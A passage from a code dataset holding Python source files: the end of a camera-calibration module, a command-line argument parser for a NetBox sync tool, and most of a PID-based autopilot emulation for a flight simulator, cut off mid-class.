np.rint(self.map_x).astype(int), delimiter=\", \", fmt=\"%4i\")\n np.savetxt(\"{}int_map_y.csv\".format(csv_directory), np.rint(self.map_y).astype(int), delimiter=\", \", fmt=\"%4i\")\n #np.savetxt(\"{}int_reverse_map_x.csv\".format(csv_directory), np.rint(self.reverse_map_x).astype(int), delimiter=\", \", fmt=\"%4i\")\n #np.savetxt(\"{}int_reverse_map_y.csv\".format(csv_directory), np.rint(self.reverse_map_y).astype(int), delimiter=\", \", fmt=\"%4i\")\n\n def load_results(self, timestamp):\n logging.debug(\"Loading results from '{}\".format(timestamp))\n directory = \"results/{}/\".format(timestamp)\n\n self.coefficients = np.load(\"{}dist_coeffs.npy\".format(directory))\n self.original_camera_matrix = np.load(\"{}original_camera_matrix.npy\".format(directory))\n self.alpha = np.load(\"{}alpha.npy\".format(directory))\n\n self.new_camera_matrix = self.original_camera_matrix\n logging.debug(\"Loading results - Complete\")\n\n def distort_point(self, point):\n return self._remap_point(point, (self.map_x, self.map_y))\n\n #def undistort_point(self, point):\n #return self._remap_point(point, (self.reverse_map_x, self.reverse_map_y))\n\n @staticmethod\n def _remap_point(point, maps):\n map_x, map_y = maps\n x, y = point\n return map_x[y][x], map_y[y][x]\n\n \"\"\"\n def _generate_reverse_map(self):\n logging.debug(\"Generating undistort(reverse) map\")\n # Currently generates reverse map with same size\n self.reverse_map_x = np.empty_like(self.map_x)\n self.reverse_map_y = np.empty_like(self.map_y)\n self.reverse_map_x[:] = np.NAN\n self.reverse_map_y[:] = np.NAN\n\n for row_no, rows in enumerate(zip(self.map_x, self.map_y)):\n for col_no, elements in enumerate(zip(*rows)):\n try:\n self.reverse_map_x[elements[1]][elements[0]] = col_no\n self.reverse_map_y[elements[1]][elements[0]] = row_no\n except IndexError:\n pass\n logging.debug(\"Initial reverse map generated, now elliminating NAN's if any\")\n while np.isnan(self.reverse_map_x).any():\n temp_x = self.reverse_map_x.copy()\n temp_y = self.reverse_map_y.copy()\n\n #Count the number of NAN's for debugging\n number_of_NANs = np.count_nonzero(~np.isnan(temp_x))\n assert number_of_NANs == np.count_nonzero(~np.isnan(temp_y)), \"map_y must contain as many NAN's as does map_x\"\n logging.debug(\"Number of NAN-values: {}\".format(number_of_NANs))\n\n #Iterate through the map looking for NAN values\n for row_no, row in enumerate(temp_x):\n for col_no, element in enumerate(row):\n if np.isnan(element):\n #NAN found,\n #Iterate through adjacent cells and try to find value there\n for i in (1, -1):\n for j in (1, -1):\n try:\n adjecent_x = self.reverse_map_x[row_no + i][col_no + j]\n adjecent_y = self.reverse_map_y[row_no + i][col_no + j]\n except IndexError:\n pass\n else:\n if not np.isnan(adjecent_x) and not np.isnan(adjecent_y):\n temp_x[row_no][col_no] = adjecent_x\n temp_y[row_no][col_no] = adjecent_y\n self.reverse_map_x = temp_x\n self.reverse_map_y = temp_y\n\n logging.debug(\"Generating undistort(reverse) map - Complete\")\n \"\"\"\n\n def plot(self):\n screen_x = (0, 0, self.image_size[0], self.image_size[0], 0)\n screen_y = (0, self.image_size[1], self.image_size[1], 0, 0)\n\n plt.figure(1)\n plt.subplot(121)\n x = self.map_x[::20, ::20].ravel()\n y = self.map_y[::20, ::20].ravel()\n plt.plot(x, y, 'r.', markersize=1)\n plt.plot(screen_x, screen_y, 'k-')\n\n #plt.subplot(122)\n #x = self.reverse_map_x.ravel()\n #y = self.reverse_map_y.ravel()\n #plt.plot(x, y, 'g.', markersize=1)\n #plt.plot(screen_x, screen_y, 'k-')\n\n plt.show()\n","repo_name":"zidik/TelliskiviCameraCalibration","sub_path":"camera_calibrator.py","file_name":"camera_calibrator.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73289835984","text":"import os\n\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\n\nfrom module.common.logging import valid_log_levels\nfrom module.config import default_config_file_path\nfrom module import __version__, __version_date__, __url__\n\n\ndef parse_command_line(self_description=None):\n \"\"\"\n parse command line arguments, also add current version and version date to description\n\n Parameters\n ----------\n self_description: str\n short self description of this program\n\n Returns\n -------\n ArgumentParser object: with parsed command line arguments\n \"\"\"\n\n # define command line options\n description = f\"{self_description}\\nVersion: {__version__} ({__version_date__})\\nProject URL: {__url__}\"\n\n parser = ArgumentParser(\n description=description,\n formatter_class=RawDescriptionHelpFormatter)\n\n parser.add_argument(\"-c\", \"--config\", default=[], dest=\"config_files\", nargs='+',\n help=f\"points to the config file to read config data from which is not installed \"\n f\"under the default path '{default_config_file_path}'\",\n metavar=os.path.basename(default_config_file_path))\n\n parser.add_argument(\"-g\", \"--generate_config\", action=\"store_true\",\n help=\"generates default config file.\")\n\n parser.add_argument(\"-l\", \"--log_level\", choices=valid_log_levels,\n help=\"set log level (overrides config)\")\n\n parser.add_argument(\"-n\", \"--dry_run\", action=\"store_true\",\n help=\"Operate as usual but don't change anything in NetBox. Great if you want to test \"\n \"and see what would be changed.\")\n\n parser.add_argument(\"-p\", \"--purge\", action=\"store_true\",\n help=\"Remove (almost) all synced objects which were create by this script. \"\n \"This is helpful if you want to start fresh or stop using this script.\")\n\n args = parser.parse_args()\n\n # fix supplied config file path\n fixed_config_files = list()\n for config_file in args.config_files:\n\n if len(config_file) == 0:\n continue\n\n if config_file != default_config_file_path and config_file[0] != os.sep:\n config_file = os.path.realpath(os.getcwd() + os.sep + config_file)\n fixed_config_files.append(config_file)\n\n args.config_files = fixed_config_files\n\n return args\n\n# EOF\n","repo_name":"bb-Ricardo/netbox-sync","sub_path":"module/common/cli_parser.py","file_name":"cli_parser.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":226,"dataset":"github-code","pt":"48"} +{"seq_id":"16278544232","text":"from guage import globaltime\n#class AP_Lmode_c(AP_c):\n\t#Class of all the Horizontal modes in AP\nimport config\n\n\t\nclass AP_c(object):\n\t#The main autopilot class.\n\t#This is inbetween the PFD FMA and The FSX autopilot, to emulate the RJ AP correctly.\n\t\n\tdef __init__(self, PFD, attitude, global_time, aircraft):\n\t\tself.AP_on = False #Autopilot on or off\n\t\tself.Lmode = AP_Lmode_c(PFD.FMA.LNav_act, PFD.FMA.LNav_arm, globaltime.value, aircraft)\n\t\tself.Vmode = AP_Vmode_c(PFD.FMA.VNav_act, PFD.FMA.VNav_arm, globaltime.value, aircraft)\n\t\tself.FD_on = False\n\t\tself.attitude = attitude #attitude guage\n\t\tself.aircraft = aircraft\n\t\t#self.aileron_pos = 0 #The aileron position sent to FSX -16383 to 16383\n\t\tif config.debug_AP:\n\t\t\tself.lnav_debug = open(\"lnav.txt\",\"w\")\n\t\t\tself.lnav_debug.seek(0)\n\t\t\tself.vnav_debug = open(\"vnav.txt\",\"w\")\n\t\t\tself.vnav_debug.seek(0)\n\tdef quit(self):\n\t\tif config.debug_AP:\n\t\t\tself.lnav_debug.close()\n\t\t\tself.vnav_debug.close()\n\t\t\t\n\tdef AP_turnon(self):\n\t\tself.AP_on = True\n\t\tself.FD_turnon()\n\t\t\n\tdef AP_turnoff(self):\n\t\tself.AP_on = False\n\t\t\n\tdef AP_cycle(self):\n\t\tif self.AP_on:\n\t\t\t#If AP on then turn off\n\t\t\tself.AP_turnoff()\n\t\telse: #If AP off then turn on\n\t\t\tself.AP_turnon()\n\t\n\t\n\tdef comp(self, aircraft):\n\t\tself.Lmode.control(aircraft)\n\t\tself.Vmode.control(aircraft)\n\t\tif self.AP_on:\n\t\t\t#Debug\n\t\t\tif config.debug_AP:\n\t\t\t\tself.lnav_debug.write(\"%s,%s\\n\" %(self.Lmode.active.text, self.Lmode.active.debug_text))\n\t\t\t\tself.vnav_debug.write(\"%s,%s\\n\" %(self.Vmode.active.text, self.Vmode.active.debug_text))\n\t\t\tif config.mode != config.TEST:\n\t\t\t\taircraft.sevent.eventlist.list[self.aileron_pos.event_id].send()\n\t\t\t\taircraft.sevent.eventlist.list[self.elevtrim_pos.event_id].send()\n\tdef FD_turnon(self):\n\t\tif self.FD_on == False:\n\t\t\tself.FD_on = True\n\t\t\tself.Lmode.turnon()\n\t\t\tself.Vmode.turnon()\n\t\tself.attitude.FD_active.value =-1\n\t\t\n\tdef FD_turnoff(self):\n\t\tself.FD_on = False\n\t\tself.Lmode.turnoff()\n\t\tself.Vmode.turnoff()\n\t\tself.attitude.FD_active.value =0\n\n\t\t\n\tdef FD_cycle(self):\n\t\tif not (self.AP_on): #If APon do nothing\n\t\t\t\tif self.FD_on: #If FD on then turn off\n\t\t\t\t\tself.FD_turnoff()\n\t\t\t\telse: #If FD off then turn on\n\t\t\t\t\tself.FD_turnon() \n\t\t\t\n\tdef HDG_button(self):\n\t\tif self.Lmode.active != self.Lmode.HDG:\n\t\t\tself.Lmode.set_active(self.Lmode.HDG)\n\t\t\tself.FD_turnon() #make sure FD is on\n\t\telse:\n\t\t\tself.Lmode.set_active(self.Lmode.ROLL)\n\t\t\t\n\tdef PTCH_inc(self):\n\t\tself.PTCH_but(1)\n\t\t#self.Vmode.PTCH.desired_pitch += 0.5\n\t\t#self.Vmode.set_active(self.Vmode.PTCH)\n\t\t#self.FD_turnon()\n\t\t\n\tdef PTCH_dec(self):\n\t\tself.PTCH_but(-1)\n\t\t#self.Vmode.PTCH.desired_pitch -= 0.5\n\t\t#self.Vmode.set_active(self.Vmode.PTCH)\n\t\t#self.FD_turnon()\n\t\t\n\tdef PTCH_but(self, value): #Called if either pitch up or pitch down pressed\n\t\tif self.Vmode.active == self.Vmode.VS:\n\t\t\tself.Vmode.VS.VS_ref += (0.1 * value)\n\t\t\tself.Vmode.VS.check_VS_ref() #Make sure between 8 and -8\n\t\t\tself.Vmode.FMA_update(False) #No need to flash mode not changing\n\t\telif self.Vmode.active == self.Vmode.PTCH:\n\t\t\tself.Vmode.PTCH.desired_pitch += (0.5 * value)\n\t\telse: #Not in VS or PTCH mode\n\t\t\tself.Vmode.PTCH.desire_pitch = int(self.aircraft.attitude.pitch.value * 2) / 2.0 #Will round to nearest 0.5\n\t\t\tself.Vmode.set_active(self.Vmode.PTCH)\n\t\t\tself.FD_turnon()\n\t\t\t\n\tdef ALT_button(self):\n\t\tpass\n\t\n\tdef ALT_inc(self):\n\t\tself.aircraft.altimeter.bug_inc()\n\t\t\n\tdef ALT_dec(self):\n\t\tself.aircraft.altimeter.bug_dec()\n\t\t\n\tdef VS_button(self):\n\t\tif self.Vmode.active != self.Vmode.VS:\n\t\t\tself.Vmode.VS.VS_ref = int(self.aircraft.VSI.value / 100.0) / 10.0\n\t\t\tself.Vmode.VS.check_VS_ref()\n\t\t\tself.Vmode.set_active(self.Vmode.VS)\n\t\t\tself.FD_turnon() #make sure FD is on\n\t\t\n\t\telse:\n\t\t\tself.Vmode.set_active(self.Vmode.PTCH)\n\t\n\t\n\t\t\n\t\t\nclass AP_Vmode_c(AP_c):\n\t#Class of all the Laternal modes in AP\n\tdef __init__(self, act_disp, arm_disp, global_time, aircraft):\n\t\tself.PTCH = Pitch(global_time, aircraft)\n\t\tself.ALTS = Alt_Mode(global_time, aircraft)\n\t\tself.VS = Vert_Speed(global_time, aircraft)\n\t\tself.BLANK = Blank()\n\t\tself.on = False\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.act_disp = act_disp #FMA disp for active and armed fields\n\t\tself.arm_disp = arm_disp\n\t\tself.aircraft = aircraft\n\t\t\n\tdef control(self, aircraft):\n\t\tif self.active == self.PTCH:\n\t\t\tself.PTCH.control(aircraft)\n\t\t\tif self.ALTS.check_capture(aircraft):\n\t\t\t\tself.set_active(self.ALTS)\n\t\telif self.active == self.VS:\n\t\t\tself.VS.control(aircraft)\n\t\t\tif self.ALTS.check_capture(aircraft):\n\t\t\t\tself.set_active(self.ALTS)\n\t\t#elif self.active == self.HDG:\n\t\t#\tself.HDG.control(self.ROLL, aircraft)\n\tdef FMA_update(self, flash = True):\n\t\t#Update the FMA\n\t\tself.act_disp.text = self.active.text\n\t\tself.act_disp.end_arrow = self.active.end_arrow\n\t\tif flash: self.act_disp.flash()\n\t\tself.arm_disp.text = self.arm.text\n\t\tself.arm_disp.end_arrow = 0 #Always no arrow on arm\n\tdef set_active(self, mode):\n\t\tif self.active != mode:\n\t\t\tself.active = mode\n\t\t\tmode.turnon(True)\n\t\t\tif self.active == self.PTCH:\n\t\t\t\tself.arm = self.ALTS\n\t\t\tif self.active == self.VS:\n\t\t\t\tself.arm = self.ALTS\n\t\t\tself.FMA_update()\n\t\telse:#mode is already on, so only reset the P, I, and D values so AP doesn't jump.\n\t\t\tmode.turnon(False)\n\tdef turnon(self):\n\t\t#This is used to turn on vertical mode when FD or AP is turned on.\n\t\tif self.active == self.BLANK:\n\t\t\tself.set_active(self.PTCH)\n\t\t#Need to finalize logic diagram.\n\t\tself.FMA_update()\n\t\tself.on = True\n\tdef turnoff(self):\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.FMA_update()\n\t\tself.on = False\n\t\n\t\t\nclass AP_Lmode_c(AP_c):\n\t#Class of all the Laternal modes in AP\n\tdef __init__(self, act_disp, arm_disp, global_time, aircraft):\n\t\tself.ROLL = Roll(global_time, aircraft)\n\t\tself.HDG = Heading(global_time, aircraft)\n\t\tself.BLANK = Blank()\n\t\tself.on = False\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.act_disp = act_disp #FMA disp for active and armed fields\n\t\tself.arm_disp = arm_disp\n\t\tself.aircraft = aircraft\n\t\t\n\tdef control(self, aircraft):\n\t\tif self.active == self.ROLL:\n\t\t\tself.ROLL.control(aircraft)\n\t\telif self.active == self.HDG:\n\t\t\tself.HDG.control(self.ROLL, aircraft)\n\tdef FMA_update(self, flash=True):\n\t\t#Update the FMA\n\t\tself.act_disp.text = self.active.text\n\t\tself.act_disp.end_arrow = self.active.end_arrow\n\t\tif flash: self.act_disp.flash()\n\t\tself.arm_disp.text = self.arm.text\n\t\tself.arm_disp.end_arrow = 0 #Always no arrow on arm\n\t\t\n\tdef set_active(self, mode):\n\t\tif self.active != mode:\n\t\t\tself.active = mode\n\t\t\tmode.turnon(True)\n\t\t\tself.FMA_update()\n\t\telse: #mode is already on, so reset the P, I, and D values so AP doesn't jump.\n\t\t\tmode.turnon(False)\n\tdef turnon(self):\n\t\tif self.active == self.BLANK:\n\t\t\tself.set_active(self.ROLL)\n\t\t\n\t\tself.FMA_update()\n\t\tself.on = True\n\t\t\n\tdef turnoff(self):\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.FMA_update()\n\t\tself.on = False\n\t\nclass Alt_Mode(AP_Vmode_c): #ALTS\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"ALTS\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\t#PID Controller here\n\t\t#Altitude capture per brother at 3000fpm start capture at 1000 ft out, 500fpm start capture at 50ft\n\t\tself.ALT_PID = PID2_c(-1, global_time, None, 0)\n\t\tself.ALT_PID.set_gains(0.003, (200000), (0.0000001)) #Set I and P gains to make controller P only\n\t\tself.ALT_PID.set_u_limit(8.0) #Limit it to 8000 fpm\n\t\tself.ALT_PID.set_I_limit(0.0001)\n\tdef control(self, aircraft):\n\t\t#Outputs desired VS to get to capture altitude\n\t\tself.ALT_PID.calc(aircraft.altimeter.indicated.value, aircraft.altimeter.bug.value, aircraft.global_time)\n\t\tself.debug_text = self.ALT_PID.debug\n\tdef turnon(self, reset):\n\t\tpass\n\t\n\tdef check_capture(self, aircraft): #Used to check if capture is needed\n\t\tcapture = False\n\t\tself.control(aircraft)\n\t\tvs = self.ALT_PID.out * 1000\n\t\tif vs>=0: #If desired vs + then climb needed to obtain ALT bug.\n\t\t\tif aircraft.VSI.value >= vs: #if aircraft vs > desired vs then\n\t\t\t\tcapture = True\t#Initiate ALT capture\t\n\t\telse: #vs<0 descent needed to obtain ALT bug\n\t\t\tif aircraft.VSI.value <= vs: \n\t\t\t\tcapture = True\n\t\t\t\t\n\t\t#print vs, aircraft.VSI.value\n\t\treturn capture\nclass Vert_Speed(AP_Vmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"ALTS\"\n\t\tself.text = \"VS\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\t#PID Controller here\n\t\tself.VS_PID = PID3_c(10000, global_time, aircraft.elev_trim, -16383)\n\t\tself.VS_PID.set_gains((0.18* 0.6), (5.5/2), (5.5/8.0))\n\t\tself.VS_PID.set_I_limit(0.4)\n\t\tself.VS_PID.set_u_limit(0.3)\n\t\t#VS reference\n\t\tself.VS_ref = 0\n\t\tself.debug_text = \"\"\n\t\t\n\t\t\t\n\tdef check_VS_ref(self):\n\t\tif self.VS_ref < -8.0: self.VS_ref = -8.0\n\t\tif self.VS_ref > 8.0: self.VS_ref = 8.0\n\t\tself.determine_text()\n\t\t\n\tdef determine_text(self):\n\t\tself.text = \"VS %2.1f\" %abs(self.VS_ref)\n\t\tif self.VS_ref >=0.0: \n\t\t\tself.end_arrow = 1\n\t\telse:\n\t\t\tself.end_arrow = -1\n\t\n\tdef control(self, aircraft):\n\t\tself.VS_PID.calc(aircraft.VSI.value/ 1000.0, self.VS_ref, aircraft.global_time)\n\t\taircraft.AP.elevtrim_pos.value = int(self.VS_PID.out)\n\t\t#Need to jerry rig FD here\n\t\n\tdef turnon(self, reset):\n\t\tself.VS_PID.turn_on(self.aircraft.attitude.pitch.value)\n\t\t\n#Each mode has its own class , with common functions to be processed.\t\t\t\nclass Pitch(AP_Vmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"PTCH\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\tself.pitch_PID = PID2_c(10000, global_time, aircraft.elev_trim, -16383)\n\t\t#(0.08), (2 /1.5), (0.4), (1.5/ 8.0), 0.8, -0.8, 1.2, 1.0, 0.1, global_time)\n\t\tself.pitch_PID.set_gains((0.08), (2/1.5), (1.5/8))\n\t\tself.pitch_PID.set_I_limit(0.4)\n\t\tself.pitch_PID.set_u_limit(0.8)\n\t\tself.pitch_PID.set_Roc_curve(1.2, 1.0, 0.1)\n\t\tself.desired_pitch = 0.0 #This is what pitch PTCH mode will hold\n\tdef control(self, aircraft):\n\t\tself.pitch_PID.calc(aircraft.attitude.pitch.value, self.desired_pitch, aircraft.global_time)\n\t\tself.debug_text = self.pitch_PID.debug\n\t\t#print self.bank_PID.Kp, self.bank_PID.P, self.bank_PID.I, self.bank_PID.D, globaltime.value\n\t\taircraft.AP.elevtrim_pos.value = int(self.pitch_PID.out)\n\t\taircraft.attitude.FD_pitch.value = self.desired_pitch\n\t\t\n\tdef turnon(self, reset):\n\t\t\n\t\tif reset: self.reset_desired_pitch()\n\t\tself.pitch_PID.turn_on(self.desired_pitch)\n\t\t#self.pitch_PID.turn_on(self.aircraft.attitude.pitch.value)\n\tdef reset_desired_pitch(self):\n\t\t#If pitch mode active will hold current pitch\n\t\tself.desired_pitch = self.aircraft.attitude.pitch.value\n\t\t\n\t\n\nclass Roll(AP_Lmode_c):\n\t#The Roll mode. If at time of activation if under 5 degrees of bank, then AP hold 0 bank, if >5degree holds that degree.\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"ROLL\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\t#self.PID = PID_c(0.5, 0.1, 0.2, 0.0, 0.01, 0.000001, 1.0, -1.0, global_time)\n\t\tself.bank_PID = PID2_c(-16383, global_time, aircraft.aileron_pos, -16383)\n\t\tself.bank_PID.set_gains((0.35* 0.5), (2/1.5), (1.5 /8))\n\t\t#self.bank_PID.set_gains((0.25* 0.5), (2/1.5), (1.5 /8))\n\t\tself.bank_PID.set_I_limit(0.4)\n\t\tself.bank_PID.set_u_limit(0.6)\n\t\tself.bank_PID.set_Roc_curve(66.0, 0.2, 10000.3)\n\t\tself.desired_bank = 0.0 #This is what bank ROLL mode will hold\n\tdef control(self, aircraft):\n\t\tself.bank_PID.calc(aircraft.attitude.bank.value, self.desired_bank, aircraft.global_time)\n\t\tself.debug_text = self.bank_PID.debug\n\t\t#print self.bank_PID.Kp, self.bank_PID.P, self.bank_PID.I, self.bank_PID.D, globaltime.value\n\t\taircraft.AP.aileron_pos.value = int(self.bank_PID.out)\n\t\taircraft.attitude.FD_bank.value = self.desired_bank\n\t\t\n\tdef turnon(self, reset= False):\n\t\tself.bank_PID.turn_on(self.aircraft.attitude.bank.value)\n\t\tif reset: self.reset_desired_bank()\n\t\t\n\tdef reset_desired_bank(self):\n\t\t#If current aircraft bank is less than 5deg, then 0 otherwise hold current bank.\n\t\ttemp = self.aircraft.attitude.bank.value\n\t\t\n\t\tif (-5.0 < temp < 5.0):\n\t\t\tself.desired_bank = 0.0\n\t\telse:\n\t\t\tself.desired_bank = temp\n\t\t\t\n\t\t\n\t\nclass Blank(object):\n\t#This is for a blank display, if AP is off, or no armed mode.\n\tdef __init__(self):\n\t\tself.text = \"\"\n\t\tself.end_arrow = 0\n\t\tself.debug_text = \"\"\n\tdef control(self, aircraft):\n\t\t#DO NOTHING\n\t\tpass\n\t\n\tdef turnon(self, reset = False):\n\t\tpass\n\t\nclass Heading(AP_Lmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"HDG\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.heading_PID = PID2_c(-30.0, global_time, aircraft.attitude.bank, -30.0)\n\t\tself.heading_PID.set_gains((0.08), (5), (0.00001))\n\t\tself.heading_PID.set_I_limit(0.05)\n\t\tself.heading_PID.set_u_limit(1.0)\n\t\t#self.heading_PID.out = 0.0\n\t\tself.debug_text = \"\"\n\t\t\n\tdef control(self, ROLL, aircraft):\n\t\tself.heading_PID.calc(aircraft.HSI.Mag_Heading.value, aircraft.HSI.Heading_Bug.value, aircraft.global_time, True)\n\t\tself.debug_text = self.heading_PID.debug\n\t\tROLL.desired_bank = -self.heading_PID.out\n\t\tROLL.control(aircraft)\n\t\t\n\tdef turnon(self, reset=False):\n\t\tpass\n\nclass PID_c(AP_c):\n\t\n\tdef __init__(self, Kp, alpha, beta, gamma, Ti, Td, u_max, u_min, global_time):\n\t\tself.Kp = Kp #0.5\n\t\tself.beta = beta #0.2\n\t\tself.alpha = alpha #0.1\n\t\tself.gamma = gamma #0.0\n\t\tself.Ti = Ti #0.01\n\t\tself.Td = Td #0.000001\n\t\tself.u_min = u_min #-1.0\n\t\tself.u_max = u_max #1.0\n\t\tself.u = 0.0\n\t\tself.eDf_prev = 0.0\n\t\tself.eDf_prevprev = 0.0\n\t\tself.eP_prev = 0.0\n\t\tself.last_time = global_time\n\t\t\n\t\n\tdef calc(self,measured, reference, time):\n\t\t\n\t\t#Just calculate it\n\t\tTs = time- self.last_time\n\t\tself.last_time = time\n\t\tif Ts <= 0.0: Ts = 0.0001\n\t\terror = measured - reference\n\t\teP = self.beta * error\n\t\teD = self.gamma * error\n\t\t#Deriviative Part\n\t\tTsoverTf = Ts / (self.alpha * self.Td)\n\t\teDf = self.eDf_prev / (TsoverTf +1) + eD *TsoverTf / (TsoverTf +1)\n\t\tD = self.Td / Ts * (eDf - 2 *self.eDf_prev + self.eDf_prevprev)\n\t\t#Integral Part\n\t\tI = Ts / self.Ti * error\n\t\t#Proportianal Part\n\t\tP = eP - self.eP_prev\n\t\tself.u += self.Kp * (P+I+D)\n\t\t#Check for max deflection\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.eP_prev = eP\n\t\tself.eDf_prevprev = self.eDf_prev\n\t\tself.eDf_prev = eDf\n\t\t\nclass PID2_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. (Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\tself.out = 0.0\n\t\tself.debug = \"\" #Debug text\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.001 #prevent divide by 0\n\t\t\n\t\tself.last_time = time\n\t\t\n\t\t#Slow down change of reference with curve\n\t\t#self.max_Roc_limit += self.curve_slope # * dt * 3\n\t\tself.max_Roc_limit = self.max_Roc\n\t\tif self.max_Roc_limit > self.max_Roc:\n\t\t\tself.max_Roc_limit = self.max_Roc\n\t\tmax = dt * self.max_Roc_limit\n\t\tmin = dt * self.min_Roc \n\t\tcurve = (reference - self.Ref) * self.curve_slope * dt\n\t\t\n\t\t#if curve >0:\n\t#\t\tsign = 1\n\t\t#else: sign = -1\n\t\ta_curve = abs(curve)\n\t\tif a_curve > max:\n\t\t\ta_curve = max\n\t\telse:\n\t\t\t#Curve is limiting max therefore make roc limit equal to curve\n\t\t\tself.max_Roc_limit = a_curve / dt\n\t\t\tif a_curve < min:\n\t\t\t\ta_curve = min\n\t\t\n\t\tif reference > self.Ref:\n\t\t\t#if a_curve == max:\n\t\t\t#\tself.Ref = measured + a_curve\n\t\t\t#else:\n\t\t\tself.Ref += a_curve\n\t\t\tif self.Ref > reference:\n\t\t\t\tself.Ref = reference\n\t\telse: #reference < self.Ref\n\t\t\t#if a_curve == max:\n\t\t\t#\tself.Ref = measured - a_curve\n\t\t\t#else:\n\t\t\tself.Ref -= a_curve\n\t\t\tif self.Ref < reference:\n\t\t\t\tself.Ref = reference\n\t\t\t\t\n\t\t\n\t\t#Find overall error\n\t\terror = measured - self.Ref\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: error-=360.0\n\t\t\t\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (error - self.prev_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\n\t\tself.debug = self.outdata(measured, reference, time)\n\t\t\n\t\n\t\n\tdef outdata(self, measured,reference, time):\n\t\t#Just output the data of the important variables in the PID controller for debugging.\n\t\t#Measured, reference, output\n\t\ts = \"%7.3f,%f,%f,%f,%f,%f,%f,%f,%f\" %(time,measured, reference, self.Ref,self.out, self.u, self.P, self.I, self.D)\n\t\treturn s\n\nclass PID3_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. (Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.out = 0.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_a_error = 0.0\n\t\tself.prev_d_error = 0.0\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 